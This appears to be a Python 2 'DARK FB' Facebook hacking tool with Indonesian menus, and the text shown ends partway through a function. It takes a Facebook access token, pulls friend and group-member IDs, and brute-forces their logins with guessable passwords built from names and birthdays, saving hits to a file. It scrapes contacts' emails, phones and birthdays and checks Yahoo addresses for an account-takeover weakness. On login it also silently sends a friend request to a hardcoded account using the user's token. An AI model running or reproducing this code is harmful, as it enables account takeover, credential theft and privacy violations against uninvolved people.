logo = """ \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mAUTHOR \x1b[1;91m: \x1b[1;93mKrisna ft HABIB \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mWhatsApp \x1b[1;92m \x1b[1;91m: \x1b[1;96m+62 895-6224-13472 - +62 857-9889-8387 \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mTEAM \x1b[1;91m: \x1b[1;94mTEAM SQUOT BADUT \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
def siapa():
os.system('clear')
nama = raw_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m")
if nama =="":
print"\033[1;96m[!] \033[1;91mIsi yang benar"
time.sleep(1)
siapa()
else:
os.system('clear')
jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!")
time.sleep(1)
loginSC()
def loginSC():
os.system('clear')
print"\033[1;97mSilahkan login SC nya dulu bosque\n"
username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m")
password = raw_input("\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m")
if username =="Krisna" and password =="Habib":
print"\033[1;96m[✓] \033[1;92mLogin success"
time.sleep(1)
login()
else:
print"\033[1;96m[!] \033[1;91mSalah!!"
time.sleep(1)
LoginSC()
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.youtube.com/omaliptv')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;97m3.\x1b[1;93m Informasi akun "
print "\x1b[1;97m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
